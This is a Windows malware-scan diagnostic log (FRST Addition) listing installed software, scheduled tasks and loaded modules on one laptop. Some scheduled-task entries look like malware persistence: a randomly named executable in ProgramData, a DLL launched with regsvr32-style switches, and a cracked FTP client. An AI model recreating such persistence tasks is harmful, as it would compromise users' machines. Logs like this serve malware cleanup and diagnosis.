Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.43 - mIRC Co. Ltd.)
Motorola Device Manager (HKLM-x32\...\{28DB8373-C1BB-444F-A427-A55585A12ED7}) (Version: 2.5.4 - Motorola Mobility)
Motorola Device Software Update (x32 Version: 13.09.3001 - Motorola Mobility) Hidden
Motorola Mobile Drivers Installation 6.4.0 (HKLM\...\{27986EDD-C9EC-4B52-B92F-06D073F0AA52}) (Version: 6.4.0 - Motorola Mobility LLC)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
Nitro Pro 8 (HKLM\...\{2269F0D5-DE47-4313-9003-BB6357919314}) (Version: 8.5.5.7 - Nitro)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4903.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4903.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4903.1002 - Microsoft Corporation) Hidden
QuickTime Alternative 1.81 (HKLM-x32\...\QuicktimeAlt_is1) (Version: 1.81 - )
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.30164 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7040 - Realtek Semiconductor Corp.)
ReminderInstaller (HKLM-x32\...\InstallShield_{48B99BC9-CEB0-485E-96B1-4609BC86D2DE}) (Version: 1.00.0000 - Absolute Software.)
ReminderInstaller (x32 Version: 1.00.0000 - Absolute Software.) Hidden
Revo Uninstaller Pro 3.1.4 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.4 - VS Revo Group, Ltd.)
RogueKiller version 12.9.9.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.9.9.0 - Adlice Software)
SofTest v11 (HKLM-x32\...\InstallShield_{BEFAE631-635D-41B7-996E-33F134DE951D}) (Version: 11.31.1 - Examsoft)
SofTest v11 (x32 Version: 11.31.1 - Examsoft) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.9.5 - Synaptics Incorporated)
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.56083 - TeamViewer)
UserGuide (HKLM-x32\...\InstallShield_{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 1.0.0.15 - Lenovo)
UserGuide (x32 Version: 1.0.0.15 - Lenovo) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VPN Unlimited version 3.1.5 (HKLM-x32\...\{DC24521E-872B-41AF-93EA-FE477902D6FB}_is1) (Version: 3.1.5 - KeepSolid Inc.)
VUDU To Go (HKLM-x32\...\com.vudu.air.Downloader) (Version: 2.3.1 - Vudu)
VUDU To Go (x32 Version: 2.3.1 - Vudu) Hidden
Windows Driver Package - Lenovo (ACPIVPC) System (02/17/2013 9.52.0.776) (HKLM\...\35DD26BE48DAF4A9F35F969F3CB1E3E1435E661E) (Version: 02/17/2013 9.52.0.776 - Lenovo)
Windows Driver Package - Lenovo (WUDFRd) LenovoVhid (07/25/2013 10.30.0.288) (HKLM\...\6BCA401E9CBEED970D75F55FA5320F60D11984E9) (Version: 07/25/2013 10.30.0.288 - Lenovo)
WinRAR 5.30 beta 5 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.5 - win.rar GmbH)
XnConvert 1.73 (HKLM-x32\...\XnConvert_is1) (Version: 1.73 - Gougelet Pierre-e)
Yoga Picks (HKLM-x32\...\{267C8BA0-876B-4589-9F14-EFB84ABCEA7F}) (Version: 1.00.013.0731 - Lenovo)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3283718265-1983809055-1317204610-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\007\AppData\Local\Microsoft\OneDrive\17.3.6798.0207\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3283718265-1983809055-1317204610-1001_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AC}\InprocServer32 -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp_x64.dll (Intel)
CustomCLSID: HKU\S-1-5-21-3283718265-1983809055-1317204610-1001_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AD}\InprocServer32 -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp_x64.dll (Intel)

==================== Restore Points =========================

03-03-2017 21:10:31 JRT Pre-Junkware Removal

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 07:25 - 2013-08-22 07:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {03896D04-23AB-4F74-A27D-B1B71EE41E2C} - System32\Tasks\Microsoft\Windows\EnterpriseMgmt\MDMMaintenenceTask => C:\Windows\system32\MDMAgent.exe [2016-07-16] (Microsoft Corporation)
Task: {03FC901B-03A8-46EB-801A-6B41B55D19B8} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {0532AB2A-3568-4A59-9C82-2B644C49851D} - System32\Tasks\Microsoft\Windows\ErrorDetails\ErrorDetailsUpdate
Task: {09D247E6-38E4-4228-BB1B-6BE1E48FC850} - System32\Tasks\Motorola Device Manager Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2014-10-30] ()
Task: {0D2FDC56-13CB-486A-BA0A-4C648309A083} - \{087F0D47-047E-057E-7911-7879097A110A} -> No File <==== ATTENTION
Task: {11EF8237-224D-4CF9-9039-61D08754EA5D} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => C:\Windows\system32\compattelrunner.exe [2016-10-14] (Microsoft Corporation)
Task: {132934A7-AF74-4FBF-8B3E-69282D4B6053} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-06-03] (Synaptics Incorporated)
Task: {16DEA092-FB0C-40D0-AE20-0536BECC21D9} - System32\Tasks\Microsoft\Windows\EDP\EDP App Launch Task
Task: {184784E2-6ACB-4154-BD0F-A955BE13F177} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePolicyChange
Task: {1AD363AC-A1A5-4239-86F6-60C9AC4B4F31} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2016-11-01] (Microsoft Corporation)
Task: {1B65DD58-D16B-45E8-BEB4-94D7E4D64DF7} - System32\Tasks\Microsoft\Windows\EDP\EDP Auth Task
Task: {20F8AF67-5750-4720-B0AC-8D14ACF2A51E} - System32\Tasks\Microsoft\XblGameSave\XblGameSaveTaskLogon => C:\Windows\System32\XblGameSaveTask.exe [2016-07-16] (Microsoft Corporation)
Task: {287685D1-1882-4B11-8A3F-7DA00FFC31C2} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\Windows\System32\AutoWorkplace.exe
Task: {35C15BFF-0053-4E3F-9D8F-12A1B3315818} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2017-01-17] (Microsoft Corporation)
Task: {365DF4D4-9F2A-4BB6-B466-7B245416627A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {36DF9173-D619-4613-85F9-64D7768DA80D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {3726FFF1-82E3-4BF4-82F6-F49CF9A31CCE} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\Program Files\Windows Defender\\MpCmdRun.exe [2016-07-16] (Microsoft Corporation)
Task: {43DF67E8-D733-48FA-98F2-4E6D341E4A79} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => C:\Windows\system32\compattelrunner.exe [2016-10-14] (Microsoft Corporation)
Task: {44707F62-A094-44E9-AF19-40CD1E6A8FA5} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2017-01-17] (Microsoft Corporation)
Task: {51B7FB15-4DCB-400E-9A98-10E802F21FB3} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceScreenOnOff
Task: {5654DFBB-E797-4758-B9A0-8BAE94A91F1D} - System32\Tasks\Microsoft\Windows\DUSM\dusmtask => C:\Windows\System32\dusmtask.exe [2016-07-16] (Microsoft Corporation)
Task: {5B1BFB8A-7401-4997-9C41-F6CE9BD3A096} - System32\Tasks\Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate
Task: {5FAAF530-ED1B-4F7B-AD7B-1694AA0B202B} - System32\Tasks\Microsoft\Windows\CertificateServicesClient\CryptoPolicyTask
Task: {6232090F-3BD0-4E1F-960B-78CBA797F685} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\HandleWnsCommand
Task: {668FBCA0-F2D3-48CC-8B65-72CF17BC93FE} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\windows\system32\MRT.exe [2017-02-23] (Microsoft Corporation)
Task: {675C1F35-C487-4F46-8C84-0A5E9589D3C2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-07] (Google Inc.)
Task: {67DB9C2C-778D-4C59-9507-E882F7A00413} - System32\Tasks\Microsoft\Windows\Management\Provisioning\Logon => C:\Windows\system32\ProvTool.exe [2016-09-24] (Microsoft Corporation)
Task: {6B1AE720-1359-4B9E-9C0F-60167361EF01} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyRefreshTask
Task: {6D1C0035-5CAD-4340-A533-D63C9853BCC9} - System32\Tasks\Microsoft\Windows\Storage Tiers Management\Storage Tiers Management Initialization
Task: {6E8AE752-C5D2-4B34-B351-338B4370A342} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\HandleCommand
Task: {6EB74394-17E6-4CD1-922E-7ABCAA8840E5} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\007\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {769A9BD4-DD4F-4EC7-AB96-408AF78E5A35} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\Bootstrap.exe [2013-07-03] (Intel Corporation)
Task: {7AC5E1E2-2FD3-40CD-8842-88CE53A3609C} - System32\Tasks\Microsoft\Windows\DiskFootprint\StorageSense
Task: {7D64B009-CEAB-4E68-B328-7CD0AC72B421} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2016-11-01] (Microsoft Corporation)
Task: {80416385-3D28-4A19-941E-3A6AF6251733} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: {82EBF27F-B848-4FC6-A93C-0E2F5DEF2F73} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2-Logon => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\Bootstrap.exe [2013-07-03] (Intel Corporation)
Task: {84074B47-185C-4F11-9725-63EEC24862DA} - System32\Tasks\Microsoft\Windows\License Manager\TempSignedLicenseExchange
Task: {8519140C-2AEF-4987-B1B6-075F6AAB760A} - \McAfee Remediation (Prepare) -> No File <==== ATTENTION
Task: {85F00F57-CCEF-43D1-AA53-8FB9FFCD43BF} - System32\Tasks\{26246267-DEF5-4009-831D-1F5587DB66B2} => pcalua.exe -a "C:\Users\007\Downloads\188.165.245.171 Downloads\CuteFTP.Pro.v8.3.4.Cracked-REVENGE\cuteftppro.exe" -d "C:\Users\007\Downloads\188.165.245.171 Downloads\CuteFTP.Pro.v8.3.4.Cracked-REVENGE"
Task: {8689A384-D0C3-4535-8A48-350B3EB44FC9} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\Program Files\Windows Defender\\MpCmdRun.exe [2016-07-16] (Microsoft Corporation)
Task: {8794EAED-EC72-4A28-B331-B9F73019EBBE} - System32\Tasks\{6CD4C77C-DB7F-70D7-5EBC-8B31C233D9EF} => C:\ProgramData\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}\4630C17C-F19B-76D7-D36D-40D2603D087A.exe <==== ATTENTION
Task: {8992DB38-9182-4B89-A615-A01B3F8C9F8F} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {8D791FAA-0257-4EBC-A6DD-74E842528806} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceSettingChange
Task: {9851188E-AC07-4F36-BA28-6D00BB2C9C46} - System32\Tasks\Microsoft\Windows\Device Information\Device => C:\Windows\system32\devicecensus.exe [2016-10-14] (Microsoft Corporation)
Task: {A1A1610B-2B55-4C5E-BC46-458BF76BA02A} - System32\Tasks\Microsoft\XblGameSave\XblGameSaveTask => C:\Windows\System32\XblGameSaveTask.exe [2016-07-16] (Microsoft Corporation)
Task: {A234E539-ED0C-4C05-87B9-6A5BFC81F815} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\Program Files\Windows Defender\\MpCmdRun.exe [2016-07-16] (Microsoft Corporation)
Task: {A4497E84-87C6-4477-BDFD-E958CED4C0BE} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {A641F614-D34F-4C28-9705-E201521B7754} - System32\Tasks\OneDrive Standalone Update Task v2 => %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {A7F3919A-4125-4892-A812-236A5557F5E7} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-12-21] (Piriform Ltd)
Task: {AA1E3E10-D4BA-4681-8F7C-779A395428D0} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {B0C5406D-7014-49AA-9498-179A0CBB1183} - System32\Tasks\{1C4B8B9E-DE5F-6DE8-65E2-49D96144215A} => C:\PROGRA~3\ea2cb491\ddb08c37.dll/s /n /I:"/rt" "C:\PROGRA~3\ea2cb491\ddb08c37.dll"
Task: {B320E058-C6FA-413F-876B-0C9B4428AE66} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic6
Task: {B6EE76B2-4F82-4E15-9345-C867A29CBAD0} - System32\Tasks\Microsoft\Windows\Speech\SpeechModelDownloadTask => C:\Windows\system32\speech_onecore\common\SpeechModelDownload.exe [2016-09-24] (Microsoft Corporation)
Task: {BDDEF317-2692-422F-AEA2-FFD67DC7CEA3} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterUserDevice
Task: {C125018F-0B81-4B64-B7DC-0E01220E5D0E} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceAccountChange
Task: {C34D8C79-A216-4091-9D42-EC02CF67B018} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C55F594B-885F-4350-A465-7D88160B3801} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {C6B2579B-4962-4D12-883D-BBD420573A6C} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic1
Task: {CAFE5B51-DC10-4097-8DB7-704EE8566FA5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {CC1FFF22-A79B-469F-9BBD-E135EF0BE706} - \Adobe Flash Player PPAPI Notifier -> No File <==== ATTENTION
Task: {CC636E49-0109-402B-A40B-A37C29069A95} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\LocateCommandUserSession
Task: {D19A2726-897E-4F7D-9CE4-0773B449CE9E} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceConnectedToNetwork
Task: {D394BE25-2E16-45D4-AAB2-3E8861A09351} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyMonitorToastTask
Task: {D3C4106A-D511-42C6-9716-465644534C87} - System32\Tasks\microsoft\windows\applicationdata\appuriverifierinstall => C:\Windows\system32\AppHostRegistrationVerifier.exe [2016-07-16] (Microsoft Corporation)
Task: {D941F53F-7907-4FBE-B1E7-69EBD5B3A5D8} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceLocationRightsChange
Task: {DA856DF9-93EE-4AB2-87C2-867385F2262A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-07] (Google Inc.)
Task: {DD1F0805-7E74-403A-85DE-5C0E31E01169} - System32\Tasks\Microsoft\Windows\SpacePort\SpaceManagerTask => C:\Windows\system32\spaceman.exe [2016-09-15] (Microsoft Corporation)
Task: {DDAECFC0-67E3-4062-BF25-CD685F73B394} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\IntegrityCheck
Task: {DE4F9764-9E73-4F9F-8F24-A6CA1FEE3248} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {E1935286-5CEB-4530-9F4D-F6427CD704B9} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {E1949760-83C6-436C-AAC4-3082F5B107C3} - System32\Tasks\Motorola Device Manager Initial Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2014-10-30] ()
Task: {E6C59EFE-9151-4D35-BEA9-93E8415BF71B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {E7B04252-97CA-42C6-9920-F58B76B2C3E1} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic24
Task: {E9BC11D6-9D78-4595-B779-862926E669D9} - System32\Tasks\Lenovo Smart Voice => C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvTrayLoad.exe [2013-10-26] (Lenovo)
Task: {EA9BAA00-6604-4A27-8A73-AFA65F0EE1B3} - System32\Tasks\Microsoft\Windows\SharedPC\Account Cleanup => Rundll32.exe %windir%\System32\Windows.SharedPC.AccountManager.dll,StartMaintenance
Task: {ECEDC57D-8965-4EB1-BD6F-84791D928E23} - System32\Tasks\microsoft\windows\applicationdata\appuriverifierdaily => C:\Windows\system32\AppHostRegistrationVerifier.exe [2016-07-16] (Microsoft Corporation)
Task: {F3C93D2A-FB91-4888-AE34-ABFB048F8A25} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\Program Files\Windows Defender\\MpCmdRun.exe [2016-07-16] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (Whitelisted) ==============

2016-07-16 05:42 - 2016-07-16 05:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-14 08:03 - 2016-12-09 04:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-11-08 01:15 - 2017-01-17 03:25 - 00117440 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2013-10-26 19:01 - 2012-04-24 04:43 - 00390632 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
2013-10-26 19:01 - 2013-10-26 19:01 - 00061200 _____ () C:\ProgramData\LenovoTransition\Server\x64\dptf.dll
2016-12-14 08:03 - 2016-12-09 04:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-07-29 23:04 - 2016-05-24 10:43 - 08909504 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2015-10-16 04:02 - 2015-10-16 04:02 - 00043480 _____ () C:\Program Files\FileZilla FTP Client\fzshellext_64.dll
2017-01-10 22:44 - 2016-12-21 00:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-01-10 22:44 - 2016-12-21 00:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-09-24 00:58 - 2016-09-24 00:58 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-01-10 22:44 - 2016-12-21 01:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-02-02 19:58 - 2017-02-01 03:47 - 02459992 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libglesv2.dll
2017-02-02 19:58 - 2017-02-01 03:47 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libegl.dll
2017-03-01 18:15 - 2017-03-01 18:18 - 00019456 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2017-03-01 18:15 - 2017-03-01 18:18 - 21149696 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2017-03-01 18:15 - 2017-03-01 18:18 - 05380096 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\MediaEngine.dll
2016-07-30 00:06 - 2016-07-30 00:07 - 00680448 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.DesignCore.dll
2017-03-01 18:15 - 2017-03-01 18:18 - 00387584 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.RichMedia.Ink.Controls.dll
2017-03-01 18:15 - 2017-03-01 18:18 - 01047552 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.Sharing.dll
2016-07-30 00:02 - 2016-07-30 00:02 - 00291328 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00152000 _____ () C:\Program Files\VideoLAN\VLC\libvlc.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 02763200 _____ () C:\Program Files\VideoLAN\VLC\libvlccore.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00626624 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00046016 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00042944 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 12298176 _____ () C:\Program Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 01487808 _____ () C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00091072 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirect3d_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00083392 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 02568640 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00118720 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00267712 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00091072 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libvdr_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00059328 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00074176 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00684480 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00833984 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00140224 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00055232 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\librar_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00150464 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 01605056 _____ () C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00349120 _____ () C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00028608 _____ () C:\Program Files\VideoLAN\VLC\plugins\control\libwin_msg_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00068032 _____ () C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00051648 _____ () C:\Program Files\VideoLAN\VLC\plugins\control\libwin_hotkeys_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00238016 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00108992 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00108992 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
